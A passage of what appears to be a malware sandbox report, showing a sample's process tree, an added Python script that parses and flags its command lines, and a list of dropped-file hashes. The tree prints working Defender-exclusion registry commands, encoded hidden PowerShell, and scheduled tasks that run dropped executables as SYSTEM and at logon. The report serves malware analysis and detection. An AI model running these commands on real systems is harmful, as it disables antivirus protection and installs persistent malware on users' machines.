          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DDDIXrwIFTXkC" /t REG_DWORD /d 0 /reg:32
      [4] PID 784  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DDDIXrwIFTXkC" /t REG_DWORD /d 0 /reg:64
      [4] PID 1760  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UJbqbYGEalpLkUITJzR" /t REG_DWORD /d 0 /reg:32
      [4] PID 944  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UJbqbYGEalpLkUITJzR" /t REG_DWORD /d 0 /reg:64
      [4] PID 2184  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cvlBDCdIHRUn" /t REG_DWORD /d 0 /reg:32
      [4] PID 1272  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cvlBDCdIHRUn" /t REG_DWORD /d 0 /reg:64
      [4] PID 1944  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hlHvxOmTEzGU2" /t REG_DWORD /d 0 /reg:32
      [4] PID 2448  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hlHvxOmTEzGU2" /t REG_DWORD /d 0 /reg:64
      [4] PID 2020  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zYDdeyryU" /t REG_DWORD /d 0 /reg:32
      [4] PID 2980  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zYDdeyryU" /t REG_DWORD /d 0 /reg:64
      [4] PID 2420  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VYfzEhPxBNNTaEVB" /t REG_DWORD /d 0 /reg:32
      [4] PID 776  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VYfzEhPxBNNTaEVB" /t REG_DWORD /d 0 /reg:64
      [4] PID 1660  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      [4] PID 1972  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      [4] PID 2488  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt" /t REG_DWORD /d 0 /reg:32
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt" /t REG_DWORD /d 0 /reg:644⤵PID:2924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:324⤵PID:2716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:644⤵PID:1732
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gikmPHWtX" /SC once /ST 02:09:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2636
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gikmPHWtX"3⤵PID:2600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gikmPHWtX"3⤵PID:2896
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1692
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2908
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2264
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1056
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qxdnhmFGwPNMbPaLO" /SC once /ST 02:31:11 /RU "SYSTEM" /TR "\"C:\Windows\Temp\zlCauFJzutozcZAJ\HRJGqkvITgoVywn\PzPPUFP.exe\" 6V /kusite_idiWV 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "qxdnhmFGwPNMbPaLO"3⤵PID:1688
-
-
-
C:\Windows\Temp\zlCauFJzutozcZAJ\HRJGqkvITgoVywn\PzPPUFP.exeC:\Windows\Temp\zlCauFJzutozcZAJ\HRJGqkvITgoVywn\PzPPUFP.exe 6V /kusite_idiWV 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:592 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "btngLezmYLEbkDGphz"3⤵PID:576
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1632
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1448
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1120
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:2860
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zYDdeyryU\FxDvaL.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "VgITaIvscZwKwBA" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1332
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:836
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2568
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2808
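The reg.exe and schtasks.exe entries above follow one pattern: the sample adds its drop directories to the Defender exclusion lists under both HKLM\SOFTWARE\Microsoft\Windows Defender and HKLM\SOFTWARE\Policies\Microsoft\Windows Defender, once per registry view (/reg:32 and /reg:64), removes the DisableRealtimeMonitoring value it set earlier, and uses scheduled tasks to run a hidden PowerShell command as the user, to launch the dropped PzPPUFP.exe as SYSTEM, and to persist a rundll32 DLL load at logon. The -EncodedCommand argument is base64 over the UTF-16LE script text and decodes to `start-process -WindowStyle Hidden gpupdate.exe /force`. The Python below is an added example and is not part of the tria.ge report or of the sample: it parses command lines of that shape, decodes the encoded PowerShell, and returns structured findings. SAMPLE_CMDLINES is constructed from command lines in the tree (PIDs dropped); the rule and field names are this example's own, not tria.ge signature names.

```python
"""Triage the reg.exe / schtasks.exe command lines from a tria.ge process tree.

Added example, not part of the tria.ge report or of the sample. The rule
names and field names below are this example's own.
"""
import base64
import re

# Defender exclusion keys, with or without the Policies\ prefix; the sample
# writes both, once per registry view (/reg:32 and /reg:64).
_EXCLUSION = re.compile(
    r'\b(ADD|DELETE)\s+"?(HKLM\\SOFTWARE\\(Policies\\)?Microsoft\\Windows Defender'
    r'\\Exclusions\\(Paths|Extensions|Processes))"?.*?/v\s+"([^"]+)"', re.I)
_REALTIME = re.compile(
    r'\b(ADD|DELETE)\s+"?HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender'
    r'\\Real-time Protection"?.*?/v\s+"?(DisableRealtimeMonitoring)', re.I)
_REG_VIEW = re.compile(r'/reg:(32|64)', re.I)
# schtasks options; a quoted value may contain \" (the rundll32 task does).
_TASK_OPT = re.compile(r'/(TN|RU|SC|ST|TR)\s+(?:"((?:\\.|[^"\\])*)"|(\S+))', re.I)
_CREATE = re.compile(r'\bschtasks(?:\.exe)?\b.*?/create\b', re.I)
# powershell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match any -e... switch followed by a long base64 token and validate on decode.
_ENCODED = re.compile(r'-e[a-z]*\s+([A-Za-z0-9+/=]{16,})', re.I)


def decode_encoded_command(b64):
    """-EncodedCommand is base64 over UTF-16LE script text; None if it is not."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline):
    """Classify one command line; returns a finding dict or None."""
    m = _EXCLUSION.search(cmdline)
    if m:
        view = _REG_VIEW.search(cmdline)
        return {
            "technique": "defender_exclusion",
            "action": m.group(1).upper(),
            "scope": "policy" if m.group(3) else "local",
            "kind": m.group(4).lower(),
            "value": m.group(5),
            "view": view.group(1) if view else "native",
        }
    m = _REALTIME.search(cmdline)
    if m:
        view = _REG_VIEW.search(cmdline)
        return {
            "technique": "defender_realtime_monitoring",
            "action": m.group(1).upper(),
            "view": view.group(1) if view else "native",
        }
    if _CREATE.search(cmdline):
        # findall yields (option, quoted value, bare value); unescape \" in quoted ones.
        opts = {k.upper(): (quoted or bare).replace('\\"', '"')
                for k, quoted, bare in _TASK_OPT.findall(cmdline)}
        command = opts.get("TR", "")
        enc = _ENCODED.search(command)
        return {
            "technique": "scheduled_task",
            "name": opts.get("TN"),
            "run_as": opts.get("RU"),
            "schedule": opts.get("SC", "").upper(),
            "command": command,
            "decoded_powershell": decode_encoded_command(enc.group(1)) if enc else None,
        }
    return None


def triage_all(cmdlines):
    """Findings for every command line that matched a rule, in input order."""
    return [f for f in map(triage, cmdlines) if f is not None]


def excluded_paths(findings):
    """Distinct paths added to a Defender Paths exclusion list (either scope, either view)."""
    return sorted({f["value"] for f in findings
                   if f["technique"] == "defender_exclusion"
                   and f["action"] == "ADD" and f["kind"] == "paths"})


# Constructed from the process tree above (command lines only, PIDs dropped).
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:64',
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zYDdeyryU" /t REG_DWORD /d 0 /reg:32',
    r'REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64',
    r'REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32',
    r'schtasks /CREATE /TN "gikmPHWtX" /SC once /ST 02:09:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'schtasks /CREATE /TN "qxdnhmFGwPNMbPaLO" /SC once /ST 02:31:11 /RU "SYSTEM" /TR "\"C:\Windows\Temp\zlCauFJzutozcZAJ\HRJGqkvITgoVywn\PzPPUFP.exe\" 6V /kusite_idiWV 525403 /S" /V1 /F',
    r'schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zYDdeyryU\FxDvaL.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "VgITaIvscZwKwBA" /V1 /F',
    r'gpscript.exe /RefreshSystemParam',
]

if __name__ == "__main__":
    for finding in triage_all(SAMPLE_CMDLINES):
        print(finding)
    print("excluded paths:", excluded_paths(triage_all(SAMPLE_CMDLINES)))
```

Two points worth carrying into a detection. The parent reg.exe is the 32-bit copy in SysWOW64, so without /reg:64 its HKLM\SOFTWARE writes would be redirected to Wow6432Node; the sample passes both views explicitly, which is why every exclusion appears twice in the signatures block, and a rule that keys on only one view sees half the writes. And the PowerShell task is not the payload: it decodes to a hidden gpupdate /force, which makes the Policies\Microsoft\Windows Defender exclusions take effect immediately; the three gpscript.exe /RefreshSystemParam processes at the bottom of the tree are consistent with that policy refresh.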
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 338KB
  MD5: 157c0da78999fb6a3b210778cf25214e
  SHA1: 7c1744093d41b8e99e0adcba7b1d52c25cc571e0
  SHA256: e97a0111685dd8a399a2aae55170768d906da953e4576a795a3284d34e6cc493
  SHA512: efd487705dfdcc7f94a8fda04da62d60dff60e7c6fb864e4b2dafa21777ef9fee8e17f1647a9d06d9e32b42799c9bfc7a4a7982323de3e874e8168de4fb2451c
- Filesize: 118KB
  MD5: 58d9c3e54649587ac0da372567ef81e9
  SHA1: e88c985c75cd2af16058710f3f21a9f555588d16
  SHA256: 2f28b80d6d258f0cd56e38d6feb0c58df253123dbaff2d92a9dbdc68e7cb0810
  SHA512: c6fdb99c927d32399cb04d808661805f2f851b70a5082a1aac009cef3ce368ca5671348277f2982ded857a62636165ecf918a2fbd024e6c7962a3d7d57e9cc75
- Filesize: 2.2MB
  MD5: 99c8e1f95114bb15d116df3cedf4b1fd
  SHA1: e6b7e89dc4e7d2360e2b47e4eec8ac07fe74e236
  SHA256: 660d672da3206f4c50be0dd75510cede5f1c9f9cf7e31720e6affbbbd7cabfd5
  SHA512: 6d2e51e27fd4a0a1bf0cd66f578bcc21026f631f619f4de5a7b54f23d954036d5cbd52bdba51fcac33d3a935f365c5ba24db5195ab40f409297632b1f338c0b1
- Filesize: 1.5MB
  MD5: 475a233bb51959a817a6d93bbf5ab46e
  SHA1: e4de4d701d57d79acbb141f6db4aab7d0410f180
  SHA256: e5fb864aa5172331df30ca17959c0ec438c2446d704762ca2f0caca426d1a209
  SHA512: d5e4eab1166b6658818970c9fc5a319fd97094db41bd5ac7907bc30f9a27a8074abb8c6bf29964d46a781a49d21b5b765177923f033ee597ecdf01b7b63f8c73
- Filesize: 1.5MB
  MD5: c1eaba612f1499659ca7ffa326fe247c
  SHA1: 387814c142451559dd33116d2c6374b2c09ac7cc
  SHA256: 0175f332db09480ba31c4c296015d11640c496cd9033669f15797283a8db1d2d
  SHA512: f05af266a68d5415b6a3fe44dbf50044a9f4867618f84f2beb27619c3b382624a7ff92ba83f02bd1fac1c2e2a7da9cf56198e42fc6e401d6d1dc3a8c1ab806ef
- Filesize: 6.6MB
  MD5: fc3b37a2daaf09d4c0823f92dca868b8
  SHA1: 6b2f6cc564e510d7c48e71507e79b32cbb419a2e
  SHA256: 1a3e673287dc4ad6261df2079ae9e3c2e45e9551ae3bad267e11d1d6441665d3
  SHA512: 7ddc373583d12ae27a571db72466136963755048bcaf9767cf231c12f4ffe963157f03d76b813024114504ded0511b4ccd3753a9accbf34ab4a9a3cc6416670a
- Filesize: 3.4MB
  MD5: 9b73f5c1ea68fcde5925eecbf925f891
  SHA1: e987cae9a43c07ee561b2b3fe5bc5e112f065711
  SHA256: 8f1492f7b75422429c7fca17a1a3831ff22caf0fa9134dd3808dd475ca286b3d
  SHA512: 80e98a553c189f61e546305adb0e113a67f336987558b0dc44b9638fdbd19977a1231b4a601f03037674ebe76bfa2e1c8e29ce475bc1e5b94db471da773182b7
- Filesize: 3.9MB
  MD5: bcad2a09a874123e58f2bed3dd486ec3
  SHA1: c1f7428a45f24e7980100afab26f8cacfb3a9e08
  SHA256: 1df9985cac61997ddf3051ead95039a5432824852ae822b50c3b12d5571b96d5
  SHA512: 33ef04b125036ba2738889a376fa46ab79435d2e8786e22044350fe74e789ede6e9f2bbae61c0f211328814a7411b092d5ec92904de7675964f931d5f0a1ae07
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 6e56c92bc160797541bf755717179419
  SHA1: 651343b2715ed074ef98834419eefd9253aea527
  SHA256: 510aacf1843a77c827a0309a0ccbad154b8efa6556960d88b320aeb62447f646
  SHA512: ecab1d1bef2f46459b3f11ab99c7a137ffc3faf9c213da45c7ffe990e3747f706ef90526ed50608db27fe5648f70b9c2f23a41763e9f7adb89ece6443ac24e39
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 088bef0bda8eab741f800913f97f1c6d
  SHA1: ede7017fe3d1b13c2fee27d06026b63113019c57
  SHA256: b6b45c8523165b633b7db4bd50d11ab91ac4f1a21b1497e3a2cac66945ce7158
  SHA512: 18636f0c73d9c43b68f423bc874880ba54d8b3054d07aedccd25da1146f45b5e258c246be8adb60e61ead63edc4d9eb5cbaf960b7049d4e7de40622ce6668eae
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 1083abe274daac98a5d0e74ab35477ac
  SHA1: a77b649546fb871019a83e47de9c86fa54706be9
  SHA256: 27f9532f6cbd94af65f69e59862f80cda808555a7e6e2ee8e1a392828829a8db
  SHA512: f3a4c6fb257ea7ee02e56ba1cebeb8c31fd4ff1861a07d4822900402b3fd1dfa07e85f3e00f5200c8773069378e88a5fdd4ae6462522e50a9e68246c5bb68359
- Filesize: 1.3MB
  MD5: b9f89f290e8d327527cc4121cbf2d369
  SHA1: 2274e7b0c6bfc630e07005458f0de11c6bd5e7c5
  SHA256: 3899e087a956a3ae5a3bca7256ad84b062149ffe9c213bc466b1156159afff7d
  SHA512: f0d872696c973166f9378660f4c014cb049f6ca85cb26d6650ebe1fca32b8af5b82d3c8e1c1dd6ef8d2f0a550ecb4e8697057caefe18d1fe308769432af83952
- Filesize: 1.2MB
  MD5: 407696e509ec843bed7180fb37baca58
  SHA1: 334b00041decb4ad33f9216be498502f8a3d45fd
  SHA256: 69b5a8f980c4daa409a708166db8b762dd69e739539aa01bf9f6b7877b98b5b6
  SHA512: fa29db590754c7d0d948c7f8cc853416ad531ee29bcc2cb6a92e7d423d5977eea0981c092c0a3cd485ec59e6782a370be664f1bb78b88f9d05d7d0b46a15e5f3
- Filesize: 9KB
  MD5: b6be75fd401fea70e0316299a41de64c
  SHA1: bc440f97df4c2209c6fd8d8b80eebc00bc3cb935
  SHA256: 498a3dcca239da540b3187a8e8dda78ee29a11feec4fb91fd21f16a903fd60f9
  SHA512: b1cc2c73168817d8749e155a6014f33ef273d64b8802ab425a3271cc30c892b979e53a11709887cf89e123aa758c263f685bdc75e002a029962f72617bc16c24
- Filesize: 268B
  MD5: a62ce44a33f1c05fc2d340ea0ca118a4
  SHA1: 1f03eb4716015528f3de7f7674532c1345b2717d
  SHA256: 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
  SHA512: 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
- Filesize: 1.4MB
  MD5: 60c52115f4aaced6f4c28e3b8824b584
  SHA1: ccbb5aa7476a18071f56653ba2a42300f894d737
  SHA256: b96983e7d09f3d3fd5e2157948265ed4de4ffc1f5519ca5b19ca2c98e723b22c
  SHA512: 078520f4fbe65bc46a3f8de00e24e9bf410036e66c394548158c7c73fd9d82da71cf9280e81dc5c59bb4de0cfb496d42b39bafb60162998140b643bbb4573a31
- Filesize: 11KB
  MD5: 7db7e031daa8abc5425729fe2de0ac6c
  SHA1: f99a001444753ebebb31947fd4b88fb210f75170
  SHA256: 9e0928290bd28926adc02666eb295b52d69706bf6fa262a24ed1e33247a89e04
  SHA512: d69c6f7fee236c57f798b902198bba6bdf21c70119ea483fad3b023f89a82d9ccc57bf5a64c7cc28da44975f318c0b0425261117390800debeb4f08f8b8213bd
- Filesize: 1.7MB
  MD5: f1de932f0e73ae193ec53198599b18f2
  SHA1: 256ca4d0310d9b0c7e1554e752720c9d41d28e6d
  SHA256: e68ae31f283510d810cf4e1f0e5619725b178def4dec73a5f3ac997e405f4c9c
  SHA512: a7ff8e93e14b87b8bbc596086b30a25ba4635b524875f230b3cf9d90dfd15a369f121942c4089186419e596c5cc334412c4e19b7c2b3e63d2d0953e888b26a7f
- Filesize: 68KB
  MD5: d992f309e64cb249e5cab8dee1cd0776
  SHA1: 760757f472e0928d1f559c1f2e8b0a280b2ca24e
  SHA256: b8bf948d5fac017a9351a599d2e79e1622964695d1c756a0e10c9d1014c31b77
  SHA512: 631fdf6ef8cf4fbc6bd6a8f59765037c4d8a958e02fd340268ea8d9ebd86393d67488e7fdb1526132ca3df16205c2ce31b045031fab23fa2f5b5017fa14cad85
- Filesize: 1.0MB
  MD5: 169d61248c0b5373e8d2dfc10628ae48
  SHA1: b7829fc51f65f03186bad00231357d5b0cd9135f
  SHA256: 7c7036891883006ea663544dc3ca03e4dc1ffb2186eb34f1f770b2fad796934a
  SHA512: a612bf939cb05b67374ac395a7c59055405a5a781ecbb75c5a03b9483b726f8823aed6a73ee0151246d076af4e633d1a08e04f64f9fc2a7ad2a3bd20bc1ccda9
- Filesize: 1.2MB
  MD5: 538b070c5a5b5735ff586e78907b89cb
  SHA1: 9c15d8105bb46faa3d264ad61e0eb7a972b84d2b
  SHA256: 561e4e2b2a0ae3d6bbd49e1043c7565bb9aaf4f464563fcf4ad96e449c6ecc6c
  SHA512: e3740f6b4febdb0bbbc362f982f4e733ef57e44cef61494cd68afe2a8c5f23529c744496a540b30e256d1af2b005fcec1eae0abb09771309b34c05c34c213207
- Filesize: 871KB
  MD5: 8aec545fa3b7f968a1318766e5e83629
  SHA1: abc5dee611a6e77205d74d67e58c10872a431a7f
  SHA256: 6b778ad51d5e57d0cecffb8f93a7f31c05199f24fd9d3b68261b27cdf8a78af4
  SHA512: 47d203da7102d339e140de9f2d760099e9ce4741f22e9b18cde80d4d4456d4214b8b5c1a0cc8c767244a8f5a4860c630aaa5417dbe30fd9a6856f2dca202cb0d
- Filesize: 996KB
  MD5: 423842fe5b6437a3fca75070bac4a052
  SHA1: de893a280411ddc2b50c4671de71c70324bd61c2
  SHA256: 3f0db96c695214878db6bde6189b59d8327c4abb6f518da9bb7125cf8816c2d6
  SHA512: 29e261a1fe475e6e4b43b0201152c83914bb5c64e21998a61f850729b18a662a58bcd57f7cf7b0f83c6b17f50b73f82cf28f38200ce38121928d4500a8ef9ab2